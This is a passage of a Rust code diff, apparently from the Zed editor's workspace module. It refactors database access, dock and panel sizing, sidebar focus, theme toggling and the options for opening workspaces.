(Origin::Center, direction) => { @@ -4355,7 +4866,7 @@ impl Workspace { match direction { SplitDirection::Up => None, SplitDirection::Down => try_dock(&self.bottom_dock), - SplitDirection::Left => try_dock(&self.left_dock), + SplitDirection::Left => try_dock(&self.left_dock).or(sidebar_target), SplitDirection::Right => try_dock(&self.right_dock), } } @@ -4369,18 +4880,24 @@ impl Workspace { } } + (Origin::LeftDock, SplitDirection::Left) => sidebar_target, + (Origin::LeftDock, SplitDirection::Down) | (Origin::RightDock, SplitDirection::Down) => try_dock(&self.bottom_dock), (Origin::BottomDock, SplitDirection::Up) => get_last_active_pane().map(Target::Pane), - (Origin::BottomDock, SplitDirection::Left) => try_dock(&self.left_dock), + (Origin::BottomDock, SplitDirection::Left) => { + try_dock(&self.left_dock).or(sidebar_target) + } (Origin::BottomDock, SplitDirection::Right) => try_dock(&self.right_dock), (Origin::RightDock, SplitDirection::Left) => { if let Some(last_active_pane) = get_last_active_pane() { Some(Target::Pane(last_active_pane)) } else { - try_dock(&self.bottom_dock).or_else(|| try_dock(&self.left_dock)) + try_dock(&self.bottom_dock) + .or_else(|| try_dock(&self.left_dock)) + .or(sidebar_target) } } @@ -4409,6 +4926,9 @@ impl Workspace { } }) } + Some(ActivateInDirectionTarget::Sidebar(focus_handle)) => { + focus_handle.focus(window, cx); + } None => {} } } @@ -4503,11 +5023,12 @@ impl Workspace { .into_iter() .find(|dock| dock.focus_handle(cx).contains_focused(window, cx)); - if let Some(dock) = active_dock { - let Some(panel_size) = dock.read(cx).active_panel_size(window, cx) else { + if let Some(dock_entity) = active_dock { + let dock = dock_entity.read(cx); + let Some(panel_size) = self.dock_size(&dock, window, cx) else { return; }; - match dock.read(cx).position() { + match dock.position() { DockPosition::Left => self.resize_left_dock(panel_size + amount, window, cx), DockPosition::Bottom => self.resize_bottom_dock(panel_size + amount, window, cx), 
DockPosition::Right => self.resize_right_dock(panel_size + amount, window, cx), @@ -5043,7 +5564,9 @@ impl Workspace { if let Some(project_id) = other_project_id { let app_state = self.app_state.clone(); crate::join_in_room_project(project_id, remote_participant.user.id, app_state, cx) - .detach_and_log_err(cx); + .detach_and_prompt_err("Failed to join project", window, cx, |error, _, _| { + Some(format!("{error:#}")) + }); } } @@ -5768,7 +6291,8 @@ impl Workspace { self.update_active_view_for_followers(window, cx); if let Some(database_id) = self.database_id { - cx.background_spawn(persistence::DB.update_timestamp(database_id)) + let db = WorkspaceDb::global(cx); + cx.background_spawn(async move { db.update_timestamp(database_id).await }) .detach(); } } else { @@ -5817,6 +6341,7 @@ impl Workspace { self.database_id } + #[cfg(any(test, feature = "test-support"))] pub(crate) fn set_database_id(&mut self, id: WorkspaceId) { self.database_id = Some(id); } @@ -5836,15 +6361,17 @@ impl Workspace { let window_bounds = window.inner_window_bounds(); let database_id = self.database_id; let has_paths = !self.root_paths(cx).is_empty(); + let db = WorkspaceDb::global(cx); + let kvp = db::kvp::KeyValueStore::global(cx); cx.background_executor().spawn(async move { if !has_paths { - persistence::write_default_window_bounds(window_bounds, display_uuid) + persistence::write_default_window_bounds(&kvp, window_bounds, display_uuid) .await .log_err(); } if let Some(database_id) = database_id { - DB.set_window_open_status( + db.set_window_open_status( database_id, SerializedWindowBounds(window_bounds), display_uuid, @@ -5852,7 +6379,7 @@ impl Workspace { .await .log_err(); } else { - persistence::write_default_window_bounds(window_bounds, display_uuid) + persistence::write_default_window_bounds(&kvp, window_bounds, display_uuid) .await .log_err(); } @@ -6005,53 +6532,7 @@ impl Workspace { window: &mut Window, cx: &mut App, ) -> DockStructure { - let left_dock = this.left_dock.read(cx); 
- let left_visible = left_dock.is_open(); - let left_active_panel = left_dock - .active_panel() - .map(|panel| panel.persistent_name().to_string()); - let left_dock_zoom = left_dock - .active_panel() - .map(|panel| panel.is_zoomed(window, cx)) - .unwrap_or(false); - - let right_dock = this.right_dock.read(cx); - let right_visible = right_dock.is_open(); - let right_active_panel = right_dock - .active_panel() - .map(|panel| panel.persistent_name().to_string()); - let right_dock_zoom = right_dock - .active_panel() - .map(|panel| panel.is_zoomed(window, cx)) - .unwrap_or(false); - - let bottom_dock = this.bottom_dock.read(cx); - let bottom_visible = bottom_dock.is_open(); - let bottom_active_panel = bottom_dock - .active_panel() - .map(|panel| panel.persistent_name().to_string()); - let bottom_dock_zoom = bottom_dock - .active_panel() - .map(|panel| panel.is_zoomed(window, cx)) - .unwrap_or(false); - - DockStructure { - left: DockData { - visible: left_visible, - active_panel: left_active_panel, - zoom: left_dock_zoom, - }, - right: DockData { - visible: right_visible, - active_panel: right_active_panel, - zoom: right_dock_zoom, - }, - bottom: DockData { - visible: bottom_visible, - active_panel: bottom_active_panel, - zoom: bottom_dock_zoom, - }, - } + this.capture_dock_state(window, cx) } match self.workspace_location(cx) { @@ -6087,8 +6568,9 @@ impl Workspace { user_toolchains, }; + let db = WorkspaceDb::global(cx); window.spawn(cx, async move |_| { - persistence::DB.save_workspace(serialized_workspace).await; + db.save_workspace(serialized_workspace).await; }) } WorkspaceLocation::DetachFromSession => { @@ -6096,27 +6578,30 @@ impl Workspace { let display = window.display(cx).and_then(|d| d.uuid().ok()); // Save dock state for empty local workspaces let docks = build_serialized_docks(self, window, cx); + let db = WorkspaceDb::global(cx); + let kvp = db::kvp::KeyValueStore::global(cx); window.spawn(cx, async move |_| { - persistence::DB - .set_window_open_status( - 
database_id, - window_bounds, - display.unwrap_or_default(), - ) - .await - .log_err(); - persistence::DB - .set_session_id(database_id, None) + db.set_window_open_status( + database_id, + window_bounds, + display.unwrap_or_default(), + ) + .await + .log_err(); + db.set_session_id(database_id, None).await.log_err(); + persistence::write_default_dock_state(&kvp, docks) .await .log_err(); - persistence::write_default_dock_state(docks).await.log_err(); }) } WorkspaceLocation::None => { // Save dock state for empty non-local workspaces let docks = build_serialized_docks(self, window, cx); + let kvp = db::kvp::KeyValueStore::global(cx); window.spawn(cx, async move |_| { - persistence::write_default_dock_state(docks).await.log_err(); + persistence::write_default_dock_state(&kvp, docks) + .await + .log_err(); }) } } @@ -6395,6 +6880,7 @@ impl Workspace { .on_action(cx.listener(Self::move_item_to_pane_at_index)) .on_action(cx.listener(Self::move_focused_panel_to_next_position)) .on_action(cx.listener(Self::toggle_edit_predictions_all_files)) + .on_action(cx.listener(Self::toggle_theme_mode)) .on_action(cx.listener(|workspace, _: &Unfollow, window, cx| { let pane = workspace.active_pane().clone(); workspace.unfollow_in_pane(&pane, window, cx); @@ -6545,9 +7031,9 @@ impl Workspace { trusted_worktrees.update(cx, |trusted_worktrees, _| { trusted_worktrees.clear_trusted_paths() }); - let clear_task = persistence::DB.clear_trusted_worktrees(); + let db = WorkspaceDb::global(cx); cx.spawn(async move |_, cx| { - if clear_task.await.log_err().is_some() { + if db.clear_trusted_worktrees().await.log_err().is_some() { cx.update(|cx| reload(cx)); } }) @@ -6564,24 +7050,33 @@ impl Workspace { |workspace: &mut Workspace, _: &ResetActiveDockSize, window, cx| { for dock in workspace.all_docks() { if dock.focus_handle(cx).contains_focused(window, cx) { - let Some(panel) = dock.read(cx).active_panel() else { - return; - }; - - // Set to `None`, then the size will fall back to the default. 
- panel.clone().set_size(None, window, cx); - + let panel = dock.read(cx).active_panel().cloned(); + if let Some(panel) = panel { + dock.update(cx, |dock, cx| { + dock.set_panel_size_state( + panel.as_ref(), + dock::PanelSizeState::default(), + cx, + ); + }); + } return; } } }, )) .on_action(cx.listener( - |workspace: &mut Workspace, _: &ResetOpenDocksSize, window, cx| { + |workspace: &mut Workspace, _: &ResetOpenDocksSize, _window, cx| { for dock in workspace.all_docks() { - if let Some(panel) = dock.read(cx).visible_panel() { - // Set to `None`, then the size will fall back to the default. - panel.clone().set_size(None, window, cx); + let panel = dock.read(cx).visible_panel().cloned(); + if let Some(panel) = panel { + dock.update(cx, |dock, cx| { + dock.set_panel_size_state( + panel.as_ref(), + dock::PanelSizeState::default(), + cx, + ); + }); } } }, @@ -6628,7 +7123,7 @@ impl Workspace { )) .on_action(cx.listener(Workspace::toggle_centered_layout)) .on_action(cx.listener( - |workspace: &mut Workspace, _action: &pane::ActivateNextItem, window, cx| { + |workspace: &mut Workspace, action: &pane::ActivateNextItem, window, cx| { if let Some(active_dock) = workspace.active_dock(window, cx) { let dock = active_dock.read(cx); if let Some(active_panel) = dock.active_panel() { @@ -6646,14 +7141,17 @@ impl Workspace { } if let Some(pane) = recent_pane { + let wrap_around = action.wrap_around; pane.update(cx, |pane, cx| { let current_index = pane.active_item_index(); let items_len = pane.items_len(); if items_len > 0 { let next_index = if current_index + 1 < items_len { current_index + 1 - } else { + } else if wrap_around { 0 + } else { + return; }; pane.activate_item( next_index, false, false, window, cx, @@ -6669,7 +7167,7 @@ impl Workspace { }, )) .on_action(cx.listener( - |workspace: &mut Workspace, _action: &pane::ActivatePreviousItem, window, cx| { + |workspace: &mut Workspace, action: &pane::ActivatePreviousItem, window, cx| { if let Some(active_dock) = 
workspace.active_dock(window, cx) { let dock = active_dock.read(cx); if let Some(active_panel) = dock.active_panel() { @@ -6687,14 +7185,17 @@ impl Workspace { } if let Some(pane) = recent_pane { + let wrap_around = action.wrap_around; pane.update(cx, |pane, cx| { let current_index = pane.active_item_index(); let items_len = pane.items_len(); if items_len > 0 { let prev_index = if current_index > 0 { current_index - 1 - } else { + } else if wrap_around { items_len.saturating_sub(1) + } else { + return; }; pane.activate_item( prev_index, false, false, window, cx, @@ -6735,6 +7236,9 @@ impl Workspace { } }), ) + .on_action(cx.listener(|workspace, _: &FocusCenterPane, window, cx| { + workspace.focus_center_pane(window, cx); + })) .on_action(cx.listener(Workspace::cancel)) } @@ -6812,6 +7316,12 @@ impl Workspace { self.modal_layer.read(cx).has_active_modal() } + pub fn is_active_modal_command_palette(&self, cx: &mut App) -> bool { + self.modal_layer + .read(cx) + .is_active_modal_command_palette(cx) + } + pub fn active_modal(&self, cx: &App) -> Option> { self.modal_layer.read(cx).active_modal() } @@ -6850,8 +7360,12 @@ impl Workspace { ) { self.centered_layout = !self.centered_layout; if let Some(database_id) = self.database_id() { - cx.background_spawn(DB.set_centered_layout(database_id, self.centered_layout)) - .detach_and_log_err(cx); + let db = WorkspaceDb::global(cx); + let centered_layout = self.centered_layout; + cx.background_spawn(async move { + db.set_centered_layout(database_id, centered_layout).await + }) + .detach_and_log_err(cx); } cx.notify(); } @@ -6882,14 +7396,49 @@ impl Workspace { leader_border_for_pane(follower_states, &pane, window, cx) }); - Some( - div() - .flex() - .flex_none() - .overflow_hidden() - .child(dock.clone()) - .children(leader_border), - ) + let mut container = div() + .flex() + .overflow_hidden() + .flex_none() + .child(dock.clone()) + .children(leader_border); + + // Apply sizing only when the dock is open. 
When closed the dock is still + // included in the element tree so its focus handle remains mounted — without + // this, toggle_panel_focus cannot focus the panel when the dock is closed. + let dock = dock.read(cx); + if let Some(panel) = dock.visible_panel() { + let size_state = dock.stored_panel_size_state(panel.as_ref()); + if position.axis() == Axis::Horizontal { + let use_flexible = panel.has_flexible_size(window, cx); + let flex_grow = if use_flexible { + size_state + .and_then(|state| state.flex) + .or_else(|| self.default_dock_flex(position)) + } else { + None + }; + if let Some(grow) = flex_grow { + let grow = grow.max(0.001); + let style = container.style(); + style.flex_grow = Some(grow); + style.flex_shrink = Some(1.0); + style.flex_basis = Some(relative(0.).into()); + } else { + let size = size_state + .and_then(|state| state.size) + .unwrap_or_else(|| panel.default_size(window, cx)); + container = container.w(size); + } + } else { + let size = size_state + .and_then(|state| state.size) + .unwrap_or_else(|| panel.default_size(window, cx)); + container = container.h(size); + } + } + + Some(container) } pub fn for_window(window: &Window, cx: &App) -> Option> { @@ -6959,54 +7508,66 @@ impl Workspace { } } - fn adjust_dock_size_by_px( + fn resize_dock( &mut self, - panel_size: Pixels, dock_pos: DockPosition, - px: Pixels, + new_size: Pixels, window: &mut Window, cx: &mut Context, ) { match dock_pos { - DockPosition::Left => self.resize_left_dock(panel_size + px, window, cx), - DockPosition::Right => self.resize_right_dock(panel_size + px, window, cx), - DockPosition::Bottom => self.resize_bottom_dock(panel_size + px, window, cx), + DockPosition::Left => self.resize_left_dock(new_size, window, cx), + DockPosition::Right => self.resize_right_dock(new_size, window, cx), + DockPosition::Bottom => self.resize_bottom_dock(new_size, window, cx), } } fn resize_left_dock(&mut self, new_size: Pixels, window: &mut Window, cx: &mut App) { - let size = 
new_size.min(self.bounds.right() - RESIZE_HANDLE_SIZE); + let workspace_width = self.bounds.size.width; + let mut size = new_size.min(workspace_width - RESIZE_HANDLE_SIZE); + + self.right_dock.read_with(cx, |right_dock, cx| { + let right_dock_size = right_dock + .stored_active_panel_size(window, cx) + .unwrap_or(Pixels::ZERO); + if right_dock_size + size > workspace_width { + size = workspace_width - right_dock_size + } + }); + let flex_grow = self.dock_flex_for_size(DockPosition::Left, size, window, cx); self.left_dock.update(cx, |left_dock, cx| { if WorkspaceSettings::get_global(cx) .resize_all_panels_in_dock .contains(&DockPosition::Left) { - left_dock.resize_all_panels(Some(size), window, cx); + left_dock.resize_all_panels(Some(size), flex_grow, window, cx); } else { - left_dock.resize_active_panel(Some(size), window, cx); + left_dock.resize_active_panel(Some(size), flex_grow, window, cx); } }); } fn resize_right_dock(&mut self, new_size: Pixels, window: &mut Window, cx: &mut App) { - let mut size = new_size.max(self.bounds.left() - RESIZE_HANDLE_SIZE); + let workspace_width = self.bounds.size.width; + let mut size = new_size.min(workspace_width - RESIZE_HANDLE_SIZE); self.left_dock.read_with(cx, |left_dock, cx| { let left_dock_size = left_dock - .active_panel_size(window, cx) + .stored_active_panel_size(window, cx) .unwrap_or(Pixels::ZERO); - if left_dock_size + size > self.bounds.right() { - size = self.bounds.right() - left_dock_size + if left_dock_size + size > workspace_width { + size = workspace_width - left_dock_size } }); + let flex_grow = self.dock_flex_for_size(DockPosition::Right, size, window, cx); self.right_dock.update(cx, |right_dock, cx| { if WorkspaceSettings::get_global(cx) .resize_all_panels_in_dock .contains(&DockPosition::Right) { - right_dock.resize_all_panels(Some(size), window, cx); + right_dock.resize_all_panels(Some(size), flex_grow, window, cx); } else { - right_dock.resize_active_panel(Some(size), window, cx); + 
right_dock.resize_active_panel(Some(size), flex_grow, window, cx); } }); } @@ -7018,9 +7579,9 @@ impl Workspace { .resize_all_panels_in_dock .contains(&DockPosition::Bottom) { - bottom_dock.resize_all_panels(Some(size), window, cx); + bottom_dock.resize_all_panels(Some(size), None, window, cx); } else { - bottom_dock.resize_active_panel(Some(size), window, cx); + bottom_dock.resize_active_panel(Some(size), None, window, cx); } }); } @@ -7038,6 +7599,29 @@ impl Workspace { }); } + fn toggle_theme_mode(&mut self, _: &ToggleMode, _window: &mut Window, cx: &mut Context) { + let current_mode = ThemeSettings::get_global(cx).theme.mode(); + let next_mode = match current_mode { + Some(theme_settings::ThemeAppearanceMode::Light) => { + theme_settings::ThemeAppearanceMode::Dark + } + Some(theme_settings::ThemeAppearanceMode::Dark) => { + theme_settings::ThemeAppearanceMode::Light + } + Some(theme_settings::ThemeAppearanceMode::System) | None => { + match cx.theme().appearance() { + theme::Appearance::Light => theme_settings::ThemeAppearanceMode::Dark, + theme::Appearance::Dark => theme_settings::ThemeAppearanceMode::Light, + } + } + }; + + let fs = self.project().read(cx).fs().clone(); + settings::update_settings_file(fs, cx, move |settings, _cx| { + theme_settings::set_mode(settings, next_mode); + }); + } + pub fn show_worktree_trust_security_modal( &mut self, toggle: bool, @@ -7129,6 +7713,7 @@ impl GlobalAnyActiveCall { cx.global() } } + /// Workspace-local view of a remote participant's location. 
#[derive(Clone, Copy, Debug, PartialEq, Eq)] pub enum ParticipantLocation { @@ -7321,9 +7906,11 @@ fn open_items( }) } +#[derive(Clone)] enum ActivateInDirectionTarget { Pane(Entity), Dock(Entity), + Sidebar(FocusHandle), } fn notify_if_database_failed(window: WindowHandle, cx: &mut AsyncApp) { @@ -7376,11 +7963,10 @@ fn adjust_active_dock_size_by_px( return; }; let dock = active_dock.read(cx); - let Some(panel_size) = dock.active_panel_size(window, cx) else { + let Some(panel_size) = workspace.dock_size(&dock, window, cx) else { return; }; - let dock_pos = dock.position(); - workspace.adjust_dock_size_by_px(panel_size, dock_pos, px, window, cx); + workspace.resize_dock(dock.position(), panel_size + px, window, cx); } fn adjust_open_docks_size_by_px( @@ -7392,23 +7978,21 @@ fn adjust_open_docks_size_by_px( let docks = workspace .all_docks() .into_iter() - .filter_map(|dock| { - if dock.read(cx).is_open() { - let dock = dock.read(cx); - let panel_size = dock.active_panel_size(window, cx)?; + .filter_map(|dock_entity| { + let dock = dock_entity.read(cx); + if dock.is_open() { let dock_pos = dock.position(); - Some((panel_size, dock_pos, px)) + let panel_size = workspace.dock_size(&dock, window, cx)?; + Some((dock_pos, panel_size + px)) } else { None } }) .collect::>(); - docks - .into_iter() - .for_each(|(panel_size, dock_pos, offset)| { - workspace.adjust_dock_size_by_px(panel_size, dock_pos, offset, window, cx); - }); + for (position, new_size) in docks { + workspace.resize_dock(position, new_size, window, cx); + } } impl Focusable for Workspace { @@ -7458,7 +8042,7 @@ impl Render for Workspace { } else { (None, None) }; - let ui_font = theme::setup_ui_font(window, cx); + let ui_font = theme_settings::setup_ui_font(window, cx); let theme = cx.theme().clone(); let colors = theme.colors(); @@ -7557,6 +8141,7 @@ impl Render for Workspace { { workspace.previous_dock_drag_coordinates = Some(e.event.position); + match e.drag(cx).0 { DockPosition::Left => { 
workspace.resize_left_dock( @@ -7722,7 +8307,6 @@ impl Render for Workspace { window, cx, )), - BottomDockLayout::RightAligned => div() .flex() .flex_row() @@ -7781,7 +8365,6 @@ impl Render for Workspace { .children(self.render_dock(DockPosition::Bottom, &self.bottom_dock, window, cx)) ), ), - BottomDockLayout::Contained => div() .flex() .flex_row() @@ -8033,9 +8616,10 @@ impl WorkspaceHandle for Entity { } pub async fn last_opened_workspace_location( + db: &WorkspaceDb, fs: &dyn fs::Fs, ) -> Option<(WorkspaceId, SerializedWorkspaceLocation, PathList)> { - DB.last_workspace(fs) + db.last_workspace(fs) .await .log_err() .flatten() @@ -8043,43 +8627,47 @@ pub async fn last_opened_workspace_location( } pub async fn last_session_workspace_locations( + db: &WorkspaceDb, last_session_id: &str, last_session_window_stack: Option>, fs: &dyn fs::Fs, ) -> Option> { - DB.last_session_workspace_locations(last_session_id, last_session_window_stack, fs) + db.last_session_workspace_locations(last_session_id, last_session_window_stack, fs) .await .log_err() } -pub struct MultiWorkspaceRestoreResult { - pub window_handle: WindowHandle, - pub errors: Vec, -} - pub async fn restore_multiworkspace( multi_workspace: SerializedMultiWorkspace, app_state: Arc, cx: &mut AsyncApp, -) -> anyhow::Result { - let SerializedMultiWorkspace { workspaces, state } = multi_workspace; - let mut group_iter = workspaces.into_iter(); - let first = group_iter - .next() - .context("window group must not be empty")?; - - let window_handle = if first.paths.is_empty() { - cx.update(|cx| open_workspace_by_id(first.workspace_id, app_state.clone(), None, cx)) - .await? +) -> anyhow::Result> { + let SerializedMultiWorkspace { + active_workspace, + state, + } = multi_workspace; + let MultiWorkspaceState { + sidebar_open, + project_group_keys, + sidebar_state, + .. 
+ } = state; + + let window_handle = if active_workspace.paths.is_empty() { + cx.update(|cx| { + open_workspace_by_id(active_workspace.workspace_id, app_state.clone(), None, cx) + }) + .await? } else { - let (window, _items) = cx + let OpenResult { window, .. } = cx .update(|cx| { Workspace::new_local( - first.paths.paths().to_vec(), + active_workspace.paths.paths().to_vec(), app_state.clone(), None, None, None, + OpenMode::Activate, cx, ) }) @@ -8087,68 +8675,31 @@ pub async fn restore_multiworkspace( window }; - let mut errors = Vec::new(); - - for session_workspace in group_iter { - let error = if session_workspace.paths.is_empty() { - cx.update(|cx| { - open_workspace_by_id( - session_workspace.workspace_id, - app_state.clone(), - Some(window_handle), - cx, - ) - }) - .await - .err() - } else { - cx.update(|cx| { - Workspace::new_local( - session_workspace.paths.paths().to_vec(), - app_state.clone(), - Some(window_handle), - None, - None, - cx, - ) - }) - .await - .err() - }; - - if let Some(error) = error { - errors.push(error); - } - } - - if let Some(target_id) = state.active_workspace_id { + if !project_group_keys.is_empty() { + let restored_keys: Vec = + project_group_keys.into_iter().map(Into::into).collect(); window_handle - .update(cx, |multi_workspace, window, cx| { - let target_index = multi_workspace - .workspaces() - .iter() - .position(|ws| ws.read(cx).database_id() == Some(target_id)); - if let Some(index) = target_index { - multi_workspace.activate_index(index, window, cx); - } else if !multi_workspace.workspaces().is_empty() { - multi_workspace.activate_index(0, window, cx); - } + .update(cx, |multi_workspace, _window, _cx| { + multi_workspace.restore_project_group_keys(restored_keys); }) .ok(); - } else { + } + + if sidebar_open { window_handle - .update(cx, |multi_workspace, window, cx| { - if !multi_workspace.workspaces().is_empty() { - multi_workspace.activate_index(0, window, cx); - } + .update(cx, |multi_workspace, _, cx| { + 
multi_workspace.open_sidebar(cx); }) .ok(); } - if state.sidebar_open { + if let Some(sidebar_state) = sidebar_state { window_handle - .update(cx, |multi_workspace, _, cx| { - multi_workspace.open_sidebar(cx); + .update(cx, |multi_workspace, window, cx| { + if let Some(sidebar) = multi_workspace.sidebar() { + sidebar.restore_serialized_state(&sidebar_state, window, cx); + } + multi_workspace.serialize(cx); }) .ok(); } @@ -8159,10 +8710,7 @@ pub async fn restore_multiworkspace( }) .ok(); - Ok(MultiWorkspaceRestoreResult { - window_handle, - errors, - }) + Ok(window_handle) } actions!( @@ -8191,6 +8739,15 @@ actions!( CopyRoomId, ] ); + +/// Opens the channel notes for a specific channel by its ID. +#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)] +#[action(namespace = collab)] +#[serde(deny_unknown_fields)] +pub struct OpenChannelNotesById { + pub channel_id: u64, +} + actions!( zed, [ @@ -8370,7 +8927,10 @@ pub fn join_channel( let mut active_window = requesting_window.or_else(|| activate_any_workspace_window(cx)); if active_window.is_none() { // no open workspaces, make one to show the error in (blergh) - let (window_handle, _) = cx + let OpenResult { + window: window_handle, + .. 
+ } = cx .update(|cx| { Workspace::new_local( vec![], @@ -8378,6 +8938,7 @@ pub fn join_channel( requesting_window, None, None, + OpenMode::Activate, cx, ) }) @@ -8450,8 +9011,18 @@ pub async fn get_any_active_multi_workspace( // find an existing workspace to focus and show call controls let active_window = activate_any_workspace_window(&mut cx); if active_window.is_none() { - cx.update(|cx| Workspace::new_local(vec![], app_state.clone(), None, None, None, cx)) - .await?; + cx.update(|cx| { + Workspace::new_local( + vec![], + app_state.clone(), + None, + None, + None, + OpenMode::Activate, + cx, + ) + }) + .await?; } activate_any_workspace_window(&mut cx).context("could not open zed") } @@ -8508,7 +9079,7 @@ pub fn workspace_windows_for_location( }; multi_workspace.read(cx).is_ok_and(|multi_workspace| { - multi_workspace.workspaces().iter().any(|workspace| { + multi_workspace.workspaces().any(|workspace| { match workspace.read(cx).workspace_location(cx) { WorkspaceLocation::Location(location, _) => { match (&location, serialized_location) { @@ -8621,8 +9192,18 @@ pub struct OpenOptions { pub focus: Option, pub open_new_workspace: Option, pub wait: bool, - pub replace_window: Option>, + pub requesting_window: Option>, + pub open_mode: OpenMode, pub env: Option>, + pub open_in_dev_container: bool, +} + +/// The result of opening a workspace via [`open_paths`], [`Workspace::new_local`], +/// or [`Workspace::open_workspace_for_paths`]. +pub struct OpenResult { + pub window: WindowHandle, + pub workspace: Entity, + pub opened_items: Vec>>>, } /// Opens a workspace by its database ID, used for restoring empty workspaces with unsaved content. 
@@ -8646,8 +9227,10 @@ pub fn open_workspace_by_id( cx, ); + let db = WorkspaceDb::global(cx); + let kvp = db::kvp::KeyValueStore::global(cx); cx.spawn(async move |cx| { - let serialized_workspace = persistence::DB + let serialized_workspace = db .workspace_for_id(workspace_id) .with_context(|| format!("Workspace {workspace_id:?} not found"))?; @@ -8666,7 +9249,7 @@ pub fn open_workspace_by_id( workspace.centered_layout = centered_layout; workspace }); - multi_workspace.add_workspace(workspace.clone(), cx); + multi_workspace.add(workspace.clone(), &*window, cx); workspace })?; (window, workspace) @@ -8679,7 +9262,7 @@ pub fn open_workspace_by_id( && let Some(bounds) = serialized_workspace.window_bounds.as_ref() { (Some(bounds.0), Some(display)) - } else if let Some((display, bounds)) = persistence::read_default_window_bounds() { + } else if let Some((display, bounds)) = persistence::read_default_window_bounds(&kvp) { (Some(bounds), Some(display)) } else { (None, None) @@ -8742,14 +9325,9 @@ pub fn open_workspace_by_id( pub fn open_paths( abs_paths: &[PathBuf], app_state: Arc, - open_options: OpenOptions, + mut open_options: OpenOptions, cx: &mut App, -) -> Task< - anyhow::Result<( - WindowHandle, - Vec>>>, - )>, -> { +) -> Task> { let abs_paths = abs_paths.to_vec(); #[cfg(target_os = "windows")] let wsl_path = abs_paths @@ -8772,10 +9350,9 @@ pub fn open_paths( let all_metadatas = futures::future::join_all(all_paths) .await .into_iter() - .filter_map(|result| result.ok().flatten()) - .collect::>(); + .filter_map(|result| result.ok().flatten()); - if all_metadatas.iter().all(|file| !file.is_dir) { + if all_metadatas.into_iter().all(|file| !file.is_dir) { cx.update(|cx| { let windows = workspace_windows_for_location( &SerializedWorkspaceLocation::Local, @@ -8797,12 +9374,46 @@ pub fn open_paths( } } + // Fallback for directories: when no flag is specified and no existing + // workspace matched, add the directory as a new workspace in the + // active window's 
MultiWorkspace (instead of opening a new window). + if open_options.open_new_workspace.is_none() && existing.is_none() { + let target_window = cx.update(|cx| { + let windows = workspace_windows_for_location( + &SerializedWorkspaceLocation::Local, + cx, + ); + let window = cx + .active_window() + .and_then(|window| window.downcast::()) + .filter(|window| windows.contains(window)) + .or_else(|| windows.into_iter().next()); + window.filter(|window| { + window.read(cx).is_ok_and(|mw| mw.multi_workspace_enabled(cx)) + }) + }); + + if let Some(window) = target_window { + open_options.requesting_window = Some(window); + window + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .log_err(); + } + } + + let open_in_dev_container = open_options.open_in_dev_container; + let result = if let Some((existing, target_workspace)) = existing { let open_task = existing .update(cx, |multi_workspace, window, cx| { window.activate_window(); - multi_workspace.activate(target_workspace.clone(), cx); + multi_workspace.activate(target_workspace.clone(), window, cx); target_workspace.update(cx, |workspace, cx| { + if open_in_dev_container { + workspace.set_open_in_dev_container(true); + } workspace.open_paths( abs_paths, OpenOptions { @@ -8828,23 +9439,31 @@ pub fn open_paths( }); }); - Ok((existing, open_task)) + Ok(OpenResult { window: existing, workspace: target_workspace, opened_items: open_task }) } else { + let init = if open_in_dev_container { + Some(Box::new(|workspace: &mut Workspace, _window: &mut Window, _cx: &mut Context| { + workspace.set_open_in_dev_container(true); + }) as Box) + Send>) + } else { + None + }; let result = cx .update(move |cx| { Workspace::new_local( abs_paths, app_state.clone(), - open_options.replace_window, + open_options.requesting_window, open_options.env, - None, + init, + open_options.open_mode, cx, ) }) .await; - if let Ok((ref window_handle, _)) = result { - window_handle + if let Ok(ref result) = result { + 
result.window .update(cx, |_, window, _cx| { window.activate_window(); }) @@ -8856,9 +9475,9 @@ pub fn open_paths( #[cfg(target_os = "windows")] if let Some(util::paths::WslPath{distro, path}) = wsl_path - && let Ok((multi_workspace_window, _)) = &result + && let Ok(ref result) = result { - multi_workspace_window + result.window .update(cx, move |multi_workspace, _window, cx| { struct OpenInWsl; let workspace = multi_workspace.workspace().clone(); @@ -8895,16 +9514,18 @@ pub fn open_new( cx: &mut App, init: impl FnOnce(&mut Workspace, &mut Window, &mut Context) + 'static + Send, ) -> Task> { + let addition = open_options.open_mode; let task = Workspace::new_local( Vec::new(), app_state, - open_options.replace_window, + open_options.requesting_window, open_options.env, Some(Box::new(init)), + addition, cx, ); cx.spawn(async move |cx| { - let (window, _opened_paths) = task.await?; + let OpenResult { window, .. } = task.await?; window .update(cx, |_, window, _cx| { window.activate_window(); @@ -8936,6 +9557,9 @@ pub fn create_and_open_local_file( .read_with(cx, |project, cx| project.try_windows_path_to_wsl(path, cx)); cx.spawn_in(window, async move |workspace, cx| { let path = path.await?; + + let path = fs.canonicalize(&path).await.unwrap_or(path); + let mut items = workspace .update_in(cx, |workspace, window, cx| { workspace.open_paths( @@ -9050,7 +9674,8 @@ async fn open_remote_project_inner( window: WindowHandle, cx: &mut AsyncApp, ) -> Result>>> { - let toolchains = DB.toolchains(workspace_id).await?; + let db = cx.update(|cx| WorkspaceDb::global(cx)); + let toolchains = db.toolchains(workspace_id).await?; for (toolchain, worktree_path, path) in toolchains { project .update(cx, |this, cx| { @@ -9107,7 +9732,7 @@ async fn open_remote_project_inner( workspace }); - multi_workspace.activate(new_workspace.clone(), cx); + multi_workspace.activate(new_workspace.clone(), window, cx); new_workspace })?; @@ -9140,20 +9765,20 @@ fn deserialize_remote_project( paths: Vec, 
cx: &AsyncApp, ) -> Task)>> { + let db = cx.update(|cx| WorkspaceDb::global(cx)); cx.background_spawn(async move { - let remote_connection_id = persistence::DB + let remote_connection_id = db .get_or_create_remote_connection(connection_options) .await?; - let serialized_workspace = - persistence::DB.remote_workspace_for_roots(&paths, remote_connection_id); + let serialized_workspace = db.remote_workspace_for_roots(&paths, remote_connection_id); let workspace_id = if let Some(workspace_id) = serialized_workspace.as_ref().map(|workspace| workspace.id) { workspace_id } else { - persistence::DB.next_id().await? + db.next_id().await? }; Ok((workspace_id, serialized_workspace)) @@ -9194,8 +9819,8 @@ pub fn join_in_room_project( existing_window_and_workspace { existing_window - .update(cx, |multi_workspace, _, cx| { - multi_workspace.activate(target_workspace, cx); + .update(cx, |multi_workspace, window, cx| { + multi_workspace.activate(target_workspace, window, cx); }) .ok(); existing_window @@ -9772,14 +10397,15 @@ pub fn remote_workspace_position_from_db( cx: &App, ) -> Task> { let paths = paths_to_open.to_vec(); + let db = WorkspaceDb::global(cx); + let kvp = db::kvp::KeyValueStore::global(cx); cx.background_spawn(async move { - let remote_connection_id = persistence::DB + let remote_connection_id = db 